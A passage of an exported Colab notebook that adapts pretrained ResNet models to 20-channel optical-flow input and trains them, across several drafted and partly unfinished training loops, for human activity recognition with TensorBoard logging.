model_dict=weight_transform(model_dict, pretrain_dict, channel)
model.load_state_dict(model_dict)
return model
def resnet50(pretrained=False, channel= 20, **kwargs):
model = ResNet(Bottleneck, [3, 4, 6, 3], nb_classes=101, channel=channel, **kwargs)
if pretrained:
pretrain_dict = model_zoo.load_url(model_urls['resnet50']) # modify pretrain code
model_dict = model.state_dict()
model_dict=weight_transform(model_dict, pretrain_dict, channel)
model.load_state_dict(model_dict)
return model
def resnet101(pretrained=False, channel= 20, **kwargs):
model = ResNet(Bottleneck, [3, 4, 23, 3],nb_classes=101, channel=channel, **kwargs)
if pretrained:
pretrain_dict = model_zoo.load_url(model_urls['resnet101']) # modify pretrain code
model_dict = model.state_dict()
model_dict=weight_transform(model_dict, pretrain_dict, channel)
model.load_state_dict(model_dict)
return model
def resnet152(pretrained=False, **kwargs):
model = ResNet(Bottleneck, [3, 8, 36, 3], **kwargs)
if pretrained:
model.load_state_dict(model_zoo.load_url(model_urls['resnet152']))
return model
def cross_modality_pretrain(conv1_weight, channel):
# transform the original 3 channel weight to "channel" channel
S=0
for i in range(3):
S += conv1_weight[:,i,:,:]
avg = S/3.
new_conv1_weight = torch.FloatTensor(64,channel,7,7)
#print type(avg),type(new_conv1_weight)
for i in range(channel):
new_conv1_weight[:,i,:,:] = avg.data
return new_conv1_weight
def weight_transform(model_dict, pretrain_dict, channel):
weight_dict = {k:v for k, v in pretrain_dict.items() if k in model_dict}
#print pretrain_dict.keys()
w3 = pretrain_dict['conv1.weight']
#print type(w3)
if channel == 3:
wt = w3
else:
wt = cross_modality_pretrain(w3,channel)
weight_dict['conv1_custom.weight'] = wt
model_dict.update(weight_dict)
return model_dict
#Test network
if __name__ == '__main__':
model = resnet34(pretrained= True, channel=20)
print(model)
# + id="ywsBlEhUshQN" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 128} outputId="685d90bc-9615-477c-ec6d-6140084286af"
# !pip install tqdm
# + id="QeqHOMLlhdi-" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 35} outputId="dd1f3218-8737-4928-9d1d-5cd7a6e752de"
import numpy as np
import pickle
from PIL import Image
import time
import tqdm
import shutil
from random import randint
import keras
from torch.utils.data import Dataset, DataLoader
import torchvision.transforms as transforms
import torchvision.models as models
import torch.nn as nn
import torch
import torch.backends.cudnn as cudnn
from torch.autograd import Variable
from torch.optim.lr_scheduler import ReduceLROnPlateau
# + id="0PEiEeO5hdlX" colab_type="code" colab={}
epochs = 500
batch_size = 64
lr = 1e-2
resume = ' '
start_epoch = 0
# + id="MQaP7KcFk9-0" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="a0adea3b-191f-4294-dfe6-581bca851c61"
# %cd HAR
# + id="yT-XQa_uu4wl" colab_type="code" colab={}
import pandas as pd
labels = pd.read_csv('train.csv',index_col = 0)
#sample_submission = pd.read_csv(path + 'sample_submission.csv')
# + id="ztlySm5bu4sj" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 204} outputId="ec2251bd-e3c2-4803-c257-b668052c88fe"
selected_labels = labels
selected_labels[:5]
# + id="i6AYea87IET8" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="2093e368-8e1f-47f7-8abc-40f1c027c082"
selected_labels['label'] = selected_labels['label'].astype(int)
selected_labels['label'].dtype
# + id="W_Q1-mwiu4l-" colab_type="code" colab={}
from sklearn.model_selection import train_test_split
train_labels, valid_labels = train_test_split(selected_labels, test_size=0.3,shuffle=True)
# + id="RbG0Fpykx-mB" colab_type="code" colab={}
import math
import numpy as np
import pandas as pd
from IPython.display import FileLink
import matplotlib.pyplot as plt
from PIL import Image
import torch
import torch.nn.functional as F
import torch.nn as nn
import torch.nn.parallel
import torch.backends.cudnn as cudnn
import torch.distributed as dist
import torch.optim
from torch.optim import lr_scheduler
import torch.utils.data
import torch.utils.data.distributed
from torch.utils.data import Dataset, DataLoader
import torchvision.transforms as transforms
import torchvision.datasets as datasets
import torchvision.models as models
from torchvision.utils import make_grid
from torch.utils.data import Dataset, DataLoader
# %matplotlib inline
# + id="zDdhdE1W-KRi" colab_type="code" colab={}
batch_size = 64
epochs = 500
num_classes = 7
# + id="yQLoGBZrwixa" colab_type="code" colab={}
transform = transforms.Compose([
transforms.ToTensor(),
])
# + id="kAiT4uayu4h7" colab_type="code" colab={}
class activityDataset(Dataset):
def __init__(self, root_dir, labels, transform):
self.labels = labels
self.root_dir = root_dir
self.transform = transform
def __len__(self):
return len(self.labels)
def __getitem__(self, idx):
item = self.labels.iloc[idx]
#print(item)
path = self.root_dir + '/' + item['id']
#print(item['id'])
image = np.load(path)
#print(image)
if self.transform:
image = self.transform(image)
#print(image,item['class'])
return image, item['label']
# + id="mRcDh5JdI9pn" colab_type="code" colab={}
t1 = activityDataset('data', train_labels, transform)
#t1[11]
# + id="MlRDjMaUu4Un" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 2397} outputId="49fa2df2-bc34-43ef-bcda-0a83cd681710"
criterion = nn.CrossEntropyLoss().cuda()
optimizer = torch.optim.Adam(model.parameters(), lr=lr)
modelres = model
modelres
# + id="1L470BLvC0fS" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 207} outputId="522fe1f3-f208-4e54-ad50-8f6ac17be158"
# !pip install tensorboard_logger
# + id="CGQtjD9UIgOM" colab_type="code" colab={}
def train(model, train, valid, optimizer, criterion, epochs=1, scheduler=None):
for epoch in range(epochs):
print('Epoch ', epoch + 1, '/', epochs)
running_loss = 0.
running_corrects = 0.
running_batches = 0.
if scheduler:
scheduler.step()
model = model.cuda()
model.train()
for i, (input, target) in enumerate(train):
input = input.cuda()
target = target.cuda()
input_var = torch.autograd.Variable(input)
target_var = torch.autograd.Variable(target)#.type(torch.LongTensor).cuda()
optimizer.zero_grad()
# compute output
output = model(input_var)
#print('output : ',output)
#print('target:',target_var)
_, preds = torch.max(output.data, 1)
loss = criterion(output, target_var)
loss.backward()
optimizer.step()
running_loss += loss.data[0]
running_corrects += torch.sum(preds == target)
running_batches += 1.
print('\r', 'Batch', i, 'Loss', loss.data[0], end='')
train_loss = running_loss / running_batches
train_acc = running_corrects / len(train.dataset.labels)
print('\r', "Train Loss", train_loss, "Train Accuracy", train_acc)
running_loss = 0.
running_corrects = 0.
running_batches = 0.
model.eval()
for i, (input, target) in enumerate(valid):
input = input.cuda()
target = target.cuda()
input_var = torch.autograd.Variable(input, volatile=True)
target_var = torch.autograd.Variable(target, volatile=True)
output = model(input_var)
_, preds = torch.max(output.data, 1)
loss = criterion(output, target_var)
running_loss += loss.data[0]
running_corrects += torch.sum(preds == target)
running_batches += 1.
valid_loss = running_loss / running_batches
valid_acc = running_corrects / len(valid.dataset.labels)
#print()
print('\r', "Val Loss", valid_loss, "Val Accuracy", valid_acc)
# + id="Ai7BZmB6Jq3m" colab_type="code" colab={}
train_dataset = activityDataset('data', train_labels, transform)
train_loader = torch.utils.data.DataLoader(
train_dataset,
batch_size=batch_size//2,
shuffle=True
)
val_loader = torch.utils.data.DataLoader(
activityDataset('data', valid_labels, transform),
batch_size=batch_size//2,
shuffle=True
)
# + id="72yxu_mTIgJF" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 894} outputId="0e2fe77a-482b-4b0d-b06c-a2b6ae9af9ba"
model_train = train(modelres, train_loader, val_loader, optimizer, criterion, epochs=100) #, scheduler=scheduler)
# + id="nshRjU_pIf-t" colab_type="code" colab={}
LOG_DIR = 'runs/temporal_cnn/'
get_ipython().system_raw(
'tensorboard --logdir {} --host 0.0.0.0 --port 6006 &'
.format(LOG_DIR)
)
# + id="hHOy_0WN2_6C" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 126} outputId="d18e0d56-95ed-4fb2-ed88-17582ad86c42"
# !git clone https://github.com/mixuala/colab_utils.git
# + id="3t6GLwALIf5H" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 90} outputId="ac79f10b-26a9-4043-d89b-1b5c2861546c"
# ! npm install -g localtunnel
# + id="EEOjfIs41ZVo" colab_type="code" colab={}
get_ipython().system_raw('lt --port 6006 >> url.txt 2>&1 &')
# + id="pkFSguSJ1ZOw" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 35} outputId="a6b45c7b-ff69-49b2-8502-508bf9a42bb4"
# ! cat url.txt
# + id="JhoKaqid1ZIc" colab_type="code" colab={}
# + id="tpMF7GB31Y_u" colab_type="code" colab={}
# + id="o0Z2gLnSEknU" colab_type="code" colab={}
epochs=300
start_epoch=0
batch_size=64
lr=0.1
momentum=0.9
weight_decay=1e-4
print_freq=10
layers=100
growth=12
droprate = 0.0
reduce=0.5
resume=''
best_prec1 = 0
# + id="TQAZ5JIXGBW1" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 1625} outputId="7217587f-c603-40c6-bea6-f313452a27db"
import os
from tensorboard_logger import configure, log_value
tensorboard = True
def main():
epochs=300
start_epoch=0
batch_size=64
lr=0.1
momentum=0.9
weight_decay=1e-4
print_freq=10
layers=100
growth=12
droprate = 0.0
reduce=0.5
resume=''
prec1 = 0
best_prec1 = 0
#tensorboard = True
name = 'temporal_cnn'
global tensorboard
#global best_prec1,start_epoch
#configure("runs/%s"%(name))
# create model
model = modelres
# for training on multiple GPUs.
# Use CUDA_VISIBLE_DEVICES=0,1 to specify which GPUs to use
# model = torch.nn.DataParallel(model).cuda()
model = model.cuda()
# optionally resume from a checkpoint
if resume:
if os.path.isfile(resume):
print("=> loading checkpoint '{}'".format(resume))
checkpoint = torch.load(resume)
start_epoch = checkpoint['epoch']
best_prec1 = checkpoint['best_prec1']
model.load_state_dict(checkpoint['state_dict'])
print("=> loaded checkpoint '{}' (epoch {})"
.format(resume, checkpoint['epoch']))
else:
print("=> no checkpoint found at '{}'".format(resume))
cudnn.benchmark = True
# define loss function (criterion) and pptimizer
criterion = nn.CrossEntropyLoss().cuda()
optimizer = torch.optim.SGD(model.parameters(), lr,
momentum=momentum,
nesterov=True,
weight_decay=weight_decay)
for epoch in range(start_epoch, epochs):
adjust_learning_rate(optimizer, epoch)
prec1 = 0
# train for one epoch
train(train_loader, model, criterion, optimizer, epoch)
# evaluate on validation set
prec1 = validate(val_loader, model, criterion, epoch)
# remember best prec@1 and save checkpoint
#print("prec1:",prec1)
#print("best_prec1:",best_prec1)
is_best = prec1 > best_prec1
best_prec1 = max(prec1, best_prec1)
save_checkpoint({
'epoch': epoch + 1,
'state_dict': model.state_dict(),
'best_prec1': best_prec1,
}, is_best)
#print('Best accuracy: ', best_prec1)
def train(train_loader, model, criterion, optimizer, epoch):
"""Train for one epoch on the training set"""
batch_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
# switch to train mode
model.train()
end = time.time()
for i, (input, target) in enumerate(train_loader):
target = target.cuda(async=True)
input = input.cuda()
input_var = torch.autograd.Variable(input)
target_var = torch.autograd.Variable(target)
# compute output
output = model(input_var)
loss = criterion(output, target_var)
# measure accuracy and record loss
prec1 = accuracy(output.data, target, topk=(1,))[0]
losses.update(loss.data[0], input.size(0))
top1.update(prec1[0], input.size(0))
# compute gradient and do SGD step
optimizer.zero_grad()
loss.backward()
optimizer.step()
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if i % print_freq == 0:
print('Epoch: [{0}][{1}/{2}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Prec@1 {top1.val:.3f} ({top1.avg:.3f})'.format(
epoch, i, len(train_loader), batch_time=batch_time,
loss=losses, top1=top1))
# log to TensorBoard
if tensorboard:
log_value('train_loss', losses.avg, epoch)
log_value('train_acc', top1.avg, epoch)
def validate(val_loader, model, criterion, epoch):
"""Perform validation on the validation set"""
batch_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
# switch to evaluate mode
model.eval()
end = time.time()
for i, (input, target) in enumerate(val_loader):
target = target.cuda(async=True)
input = input.cuda()
input_var = torch.autograd.Variable(input, volatile=True)
target_var = torch.autograd.Variable(target, volatile=True)
# compute output
output = model(input_var)
loss = criterion(output, target_var)
# measure accuracy and record loss
prec1 = accuracy(output.data, target, topk=(1,))[0]
losses.update(loss.data[0], input.size(0))
top1.update(prec1[0], input.size(0))
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if i % print_freq == 0:
print('Test: [{0}/{1}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Prec@1 {top1.val:.3f} ({top1.avg:.3f})'.format(
i, len(val_loader), batch_time=batch_time, loss=losses,
top1=top1))
print(' * Prec@1 {top1.avg:.3f}'.format(top1=top1))
# log to TensorBoard
if tensorboard:
log_value('val_loss', losses.avg, epoch)
log_value('val_acc', top1.avg, epoch)
return top1.avg
def save_checkpoint(state, is_best, filename='checkpoint.pth.tar'):
"""Saves checkpoint to disk"""
directory = "runs/%s/"%('checkpoint')
if not os.path.exists(directory):
os.makedirs(directory)
filename = directory + filename
torch.save(state, filename)
if is_best:
shutil.copyfile(filename, 'runs/%s/'%('checkpoint') + 'model_best.pth.tar')
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def adjust_learning_rate(optimizer, epoch):
lr = 0.1
"""Sets the learning rate to the initial LR decayed by 10 after 150 and 225 epochs"""
lr = lr * (0.1 ** (epoch // 150)) * (0.1 ** (epoch // 225))
# log to TensorBoard
if tensorboard:
log_value('learning_rate', lr, epoch)
for param_group in optimizer.param_groups:
param_group['lr'] = lr
def accuracy(output, target, topk=(1,)):
"""Computes the precision@k for the specified values of k"""
maxk = max(topk)
batch_size = target.size(0)
_, pred = output.topk(maxk, 1, True, True)
pred = pred.t()
correct = pred.eq(target.view(1, -1).expand_as(pred))
res = []
for k in topk:
correct_k = correct[:k].view(-1).float().sum(0)
res.append(correct_k.mul_(100.0 / batch_size))
return res
if __name__ == '__main__':
main()
# + id="qXCqs2UeGCGN" colab_type="code" colab={}
# + id="xfghLNnuGB60" colab_type="code" colab={}
# + id="uKKLeyMSGB2A" colab_type="code" colab={}
# + id="UnvghaW8GBw4" colab_type="code" colab={}
# + id="I2sS4zRFGBPY" colab_type="code" colab={}
# + id="0p7UJT30GBIJ" colab_type="code" colab={}
# + id="9C2MKgmwGBBF" colab_type="code" colab={}
# + id="b-Cal60OGA6e" colab_type="code" colab={}
# + id="um9hk1i5GA1E" colab_type="code" colab={}
# + id="T3KRJrYoGAwR" colab_type="code" colab={}
# + id="lswKAOh-GArk" colab_type="code" colab={}
# + id="3k0zayP9GAnJ" colab_type="code" colab={}
# + id="cVcVpzgjGAiP" colab_type="code" colab={}
# + id="JYWgL2cVGAbl" colab_type="code" colab={}
# + id="2FAE5eLRGAWJ" colab_type="code" colab={}
# + id="5raDkZtoGARB" colab_type="code" colab={}
# + id="h2bwYVcD-Xko" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 17} outputId="68a0f0fb-76b1-4985-8bca-6234292dea33"
import os
import shutil
import time
import torch
from tensorboard_logger import log_value
#model, train, valid, optimizer, criterion, epochs=1, scheduler=None
def train(train_dataset, train_loader, model, criterion, optimizer, val_loader, checkpoint_directory, scheduler=None):
"""Train for one epoch on the training set"""
batch_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
criterion = nn.CrossEntropyLoss().cuda()
optimizer = torch.optim.Adam(self.model.parameters(), lr=lr)
# switch to train mode
model.train()
end = time.time()
for i, (input, target) in enumerate(train_loader):
if scheduler is not None:
scheduler.batch_step()
target = target.cuda(async=True)
input = input.cuda()
input_var = torch.autograd.Variable(input)
target_var = torch.autograd.Variable(target)
# compute output
output = model(input_var)
loss = criterion(output, target_var)
# measure accuracy and record loss
prec1 = accuracy(output.data, target, topk=(1,))[0]
losses.update(loss.data[0], input.size(0))
top1.update(prec1[0], input.size(0))
samples += input.size(0)
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if i % args.print_freq == 0:
print('Epoch: {0:.4f}\t'
'Step: {1}/{2}\t'
'Samples: [{samples}]\t'
'LR: {lr}\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Samples/s {samples_per_sec:.0f}\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Prec@1 {top1.val:.3f} ({top1.avg:.3f})'.format(
samples / len(train_dataset), i, len(train_loader), samples=samples, batch_time=batch_time,
samples_per_sec=input.size(0)/batch_time.avg,
lr=get_learning_rate(optimizer)[0],# *iter_accum ???
loss=losses, top1=top1))
if i % save_steps_freq == 0:
if i>0:
# evaluate on validation set
prec1 = validate(val_loader, model, criterion, samples, args)
# remember best prec@1 and save checkpoint
print('Checkpoint')
is_best = prec1 > best_prec1
best_prec1 = max(prec1, best_prec1)
is_best_train = top1.avg > best_train_prec1
best_train_prec1 = max(top1.avg, best_train_prec1)
save_checkpoint({
'samples': samples,
'state_dict': model.state_dict(),
'best_prec1': best_prec1,
'best_train_prec1': best_train_prec1,
'train_prec1': top1.avg,
}, is_best, is_best_train,
directory=checkpoint_directory
)
# log to TensorBoard
log_value('train_loss', losses.avg, samples)
log_value('train_acc', top1.avg, samples)
log_value('learning_rate', get_learning_rate(optimizer)[0], samples)
log_value('batch_size', input.size(0), samples)
log_value('effective_batch_size', input.size(0)*args.accum, samples)
log_value('accum', args.accum, samples)
batch_time.reset()
losses.reset()
top1.reset()
return best_prec1, best_train_prec1, samples
def validate(val_loader, model, criterion, samples, args):
"""Perform validation on the validation set"""
batch_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
# switch to evaluate mode
model.eval()
end = time.time()
for i, (input, target) in enumerate(val_loader):
# print("input={}", input.size())
target = target.cuda(async=True)
input = input.cuda()
input_var = torch.autograd.Variable(input, volatile=True)
target_var = torch.autograd.Variable(target, volatile=True)
# compute output
output = model(input_var)
# print("validate vars input={} target={} output={}".format(input_var.size(), target_var.size(), output.size()))
loss = criterion(output, target_var)
# measure accuracy and record loss
prec1 = accuracy(output.data, target, topk=(1,))[0]
losses.update(loss.data[0], input.size(0))
top1.update(prec1[0], input.size(0))
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if i % args.print_freq == 0:
print('Test: [{0}/{1}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Prec@1 {top1.val:.3f} ({top1.avg:.3f})'.format(
i, len(val_loader), batch_time=batch_time, loss=losses,
top1=top1))
print(' * Prec@1 {top1.avg:.3f}'.format(top1=top1))
# log to TensorBoard
log_value('val_loss', losses.avg, samples)
log_value('val_acc', top1.avg, samples)
return top1.avg
def save_checkpoint(state, is_best, is_best_train, directory, filename='checkpoint.pth.tar'):
"""Saves checkpoint to disk"""
if not os.path.exists(directory):
os.makedirs(directory)
filename = directory + filename
torch.save(state, filename)
if is_best:
shutil.copyfile(filename, directory + 'model_best.pth.tar')
if is_best_train:
shutil.copyfile(filename, directory + 'model_best_train.pth.tar')
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def adjust_learning_rate(optimizer, epoch, lr):
"""Sets the learning rate to the initial LR decayed by 10 after 150 and 225 epochs"""
lr = lr * (0.1 ** (epoch // 150)) * (0.1 ** (epoch // 225))
# log to TensorBoard
log_value('learning_rate', lr, epoch)
for param_group in optimizer.param_groups:
param_group['lr'] = lr
def accuracy(output, target, topk=(1,)):
"""Computes the precision@k for the specified values of k"""
maxk = max(topk)
batch_size = target.size(0)
_, pred = output.topk(maxk, 1, True, True)
pred = pred.t()
correct = pred.eq(target.view(1, -1).expand_as(pred))
res = []
for k in topk:
correct_k = correct[:k].view(-1).float().sum(0)
res.append(correct_k.mul_(100.0 / batch_size))
return res
# + id="yRrnfaCf-YHe" colab_type="code" colab={}
train(model, train_loader, val_loader, optimizer, criterion, epochs=10) #, scheduler=scheduler)
# + id="5UnwWe7Q-YCs" colab_type="code" colab={}
# + id="Zw4cTEAI3RYv" colab_type="code" colab={}
def train(model, train, valid, optimizer, criterion, epochs=1, scheduler=None):
for epoch in range(epochs):
print('Epoch ', epoch + 1, '/', epochs)
running_loss = 0.
running_corrects = 0.
running_batches = 0.
if scheduler:
scheduler.step()
model = model.cuda()
model.train()
for i, (input, target) in enumerate(train):
input = input.cuda()
target = target.cuda()
input_var = torch.autograd.Variable(input)
target_var = torch.autograd.Variable(target)#.type(torch.LongTensor).cuda()
optimizer.zero_grad()
# compute output
output = model(input_var)
#print('output : ',output)
#print('target:',target_var)
_, preds = torch.max(output.data, 1)
loss = criterion(output, target_var)
loss.backward()
optimizer.step()
running_loss += loss.data[0]
running_corrects += torch.sum(preds == target)
running_batches += 1.
print('\r', 'Batch', i, 'Loss', loss.data[0], end='')
train_loss = running_loss / running_batches
train_acc = running_corrects / len(train.dataset.labels)
print('\r', "Train Loss", train_loss, "Train Accuracy", train_acc)
running_loss = 0.
running_corrects = 0.
running_batches = 0.
model.eval()
for i, (input, target) in enumerate(valid):
input = input.cuda()
target = target.cuda()
input_var = torch.autograd.Variable(input, volatile=True)
target_var = torch.autograd.Variable(target, volatile=True)
output = model(input_var)
_, preds = torch.max(output.data, 1)
loss = criterion(output, target_var)
running_loss += loss.data[0]
running_corrects += torch.sum(preds == target)
running_batches += 1.
valid_loss = running_loss / running_batches
valid_acc = running_corrects / len(valid.dataset.labels)
#print()
print('\r', "Val Loss", valid_loss, "Val Accuracy", valid_acc)
# + id="y1Sgp2uI3CiB" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 17} outputId="b4b4fd6a-d9d9-4048-c0b1-259f937435f1"
import pickle,os
from PIL import Image
import scipy.io
import time
from tqdm import tqdm
import pandas as pd
import shutil
from random import randint
import numpy as np
from torch.utils.data import Dataset, DataLoader
import torchvision.transforms as transforms
import torchvision.models as models
import torch.nn as nn
import torch
import torch.backends.cudnn as cudnn
from torch.autograd import Variable
# other util
def accuracy(output, target, topk=(1,)):
"""Computes the precision@k for the specified values of k"""
maxk = max(topk)
batch_size = target.size(0)
_, pred = output.topk(maxk, 1, True, True)
pred = pred.t()
correct = pred.eq(target.view(1, -1).expand_as(pred))
res = []
for k in topk:
correct_k = correct[:k].view(-1).float().sum(0)
res.append(correct_k.mul_(100.0 / batch_size))
return res
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def save_checkpoint(state, is_best, checkpoint, model_best):
torch.save(state, checkpoint)
if is_best:
shutil.copyfile(checkpoint, model_best)
def record_info(info,filename,mode):
if mode =='train':
result = (
'Time {batch_time} '
'Data {data_time} \n'
'Loss {loss} '
'Prec@1 {top1} '
'Prec@5 {top5}\n'
'LR {lr}\n'.format(batch_time=info['Batch Time'],
data_time=info['Data Time'], loss=info['Loss'], top1=info['Prec@1'], top5=info['Prec@5'],lr=info['lr']))
print(result)
df = pd.DataFrame.from_dict(info)
column_names = ['Epoch','Batch Time','Data Time','Loss','Prec@1','Prec@5','lr']
if mode =='test':
result = (
'Time {batch_time} \n'
'Loss {loss} '
'Prec@1 {top1} '
'Prec@5 {top5} \n'.format( batch_time=info['Batch Time'],
loss=info['Loss'], top1=info['Prec@1'], top5=info['Prec@5']))
print(result)
df = pd.DataFrame.from_dict(info)
column_names = ['Epoch','Batch Time','Loss','Prec@1','Prec@5']
if not os.path.isfile(filename):
df.to_csv(filename,index=False,columns=column_names)
else: # else it exists so append without writing the header
df.to_csv(filename,mode = 'a',header=False,index=False,columns=column_names)
# + id="LEQVNzPm3RhS" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 37} outputId="cc9f142a-f012-40d3-c78c-be5d369cdbe7"
class Motion_CNN():
def __init__(self, nb_epochs, lr, batch_size, resume, start_epoch, train_loader, test_loader, channel):
self.nb_epochs=nb_epochs
self.lr=lr
self.batch_size=batch_size
self.resume=resume
self.start_epoch=start_epoch
#self.evaluate=evaluate
self.train_loader=train_loader
self.test_loader=test_loader
self.best_prec1=0
self.channel=channel
#self.test_video=test_video
def build_model(self):
print ('==> Build model and setup loss and optimizer')
#build model
self.model = modelres.cuda()
#print self.model
#Loss function and optimizer
self.criterion = nn.CrossEntropyLoss().cuda()
self.optimizer = torch.optim.SGD(self.model.parameters(), self.lr, momentum=0.9)
self.scheduler = ReduceLROnPlateau(self.optimizer, 'min', patience=1,verbose=True)
def resume_and_evaluate(self):
if self.resume:
if os.path.isfile(self.resume):
print("==> loading checkpoint '{}'".format(self.resume))
checkpoint = torch.load(self.resume)
self.start_epoch = checkpoint['epoch']
self.best_prec1 = checkpoint['best_prec1']
self.model.load_state_dict(checkpoint['state_dict'])
self.optimizer.load_state_dict(checkpoint['optimizer'])
print("==> loaded checkpoint '{}' (epoch {}) (best_prec1 {})"
.format(self.resume, checkpoint['epoch'], self.best_prec1))
else:
print("==> no checkpoint found at '{}'".format(self.resume))
def run(self):
self.build_model()
self.resume_and_evaluate()
cudnn.benchmark = True
for self.epoch in range(self.start_epoch, self.nb_epochs):
self.train_1epoch()
prec1, val_loss = self.validate_1epoch()
is_best = prec1 > self.best_prec1
#lr_scheduler
self.scheduler.step(val_loss)
# save model
if is_best:
self.best_prec1 = prec1
with open('motion_video_preds.pickle','wb') as f:
pickle.dump(self.dic_video_level_preds,f)
f.close()
save_checkpoint({
'epoch': self.epoch,
'state_dict': self.model.state_dict(),
'best_prec1': self.best_prec1,
'optimizer' : self.optimizer.state_dict()
},is_best,'checkpoint.pth.tar','model_best.pth.tar')
def train_1epoch(self):
print('==> Epoch:[{0}/{1}][training stage]'.format(self.epoch, self.nb_epochs))
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
top5 = AverageMeter()
#switch to train mode
self.model.train()
end = time.time()
# mini-batch training
progress = tqdm(self.train_loader)
for i, (data,label) in enumerate(progress):
# measure data loading time
data_time.update(time.time() - end)
label = label.cuda(async=True)
input_var = Variable(data).cuda()
target_var = Variable(label).cuda()
# compute output
output = self.model(input_var)
loss = self.criterion(output, target_var)
# measure accuracy and record loss
prec1, prec5 = accuracy(output.data, label, topk=(1, 5))
losses.update(loss.data[0], data.size(0))
top1.update(prec1[0], data.size(0))
top5.update(prec5[0], data.size(0))
# compute gradient and do SGD step
self.optimizer.zero_grad()
loss.backward()
self.optimizer.step()
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
info = {'Epoch':[self.epoch],
'Batch Time':[round(batch_time.avg,3)],
'Data Time':[round(data_time.avg,3)],
'Loss':[round(losses.avg,5)],
'Prec@1':[round(top1.avg,4)],
'Prec@5':[round(top5.avg,4)],
'lr': self.optimizer.param_groups[0]['lr']
}
record_info(info, 'opf_train.csv','train')
def validate_1epoch(self):
print('==> Epoch:[{0}/{1}][validation stage]'.format(self.epoch, self.nb_epochs))
batch_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
top5 = AverageMeter()
# switch to evaluate mode
self.model.eval()
self.dic_video_level_preds={}
end = time.time()
progress = tqdm(self.test_loader)
for i, (keys,data,label) in enumerate(progress):
#data = data.sub_(127.353346189).div_(14.971742063)
label = label.cuda(async=True)
data_var = Variable(data, volatile=True).cuda(async=True)
label_var = Variable(label, volatile=True).cuda(async=True)
# compute output
output = self.model(data_var)
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
#Calculate video level prediction
preds = output.data.cpu().numpy()
nb_data = preds.shape[0]
for j in range(nb_data):
videoName = keys[j] # ApplyMakeup_g01_c01
if videoName not in self.dic_video_level_preds.keys():
self.dic_video_level_preds[videoName] = preds[j,:]
else:
self.dic_video_level_preds[videoName] += preds[j,:]
#Frame to video level accuracy
video_top1, video_top5, video_loss = self.frame2_video_level_accuracy()
info = {'Epoch':[self.epoch],
'Batch Time':[round(batch_time.avg,3)],
'Loss':[round(video_loss,5)],
'Prec@1':[round(video_top1,3)],
'Prec@5':[round(video_top5,3)]
}
record_info(info, 'opf_test.csv','test')
return video_top1, video_loss
def frame2_video_level_accuracy(self):
correct = 0
video_level_preds = np.zeros((len(self.dic_video_level_preds),101))
video_level_labels = np.zeros(len(self.dic_video_level_preds))
ii=0
for key in sorted(self.dic_video_level_preds.keys()):
name = key
preds = self.dic_video_level_preds[name]
label = int(self.test_video[name])-1
video_level_preds[ii,:] = preds
video_level_labels[ii] = label
ii+=1
if np.argmax(preds) == (label):
correct+=1
#top1 top5
video_level_labels = torch.from_numpy(video_level_labels).long()
video_level_preds = torch.from_numpy(video_level_preds).float()
loss = self.criterion(Variable(video_level_preds).cuda(), Variable(video_level_labels).cuda())
top1,top5 = accuracy(video_level_preds, video_level_labels, topk=(1,5))
top1 = float(top1.numpy())
top5 = float(top5.numpy())
return top1,top5,loss.data.cpu().numpy()
# + id="nrCL5Plw3RdN" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 1285} outputId="99364e83-45ac-448c-b03f-bf0daf142e06"
model = Motion_CNN(
# Data Loader
train_loader=train_loader,
test_loader=val_loader,
# Utility
start_epoch=start_epoch,
resume=resume,
#evaluate=arg.evaluate,
# Hyper-parameter
nb_epochs=epochs,
lr=lr,
batch_size=batch_size,
channel = 10*2,
#test_video=test_video
)
#Training
model.run()
# + id="vHttek5s3RTU" colab_type="code" colab={}
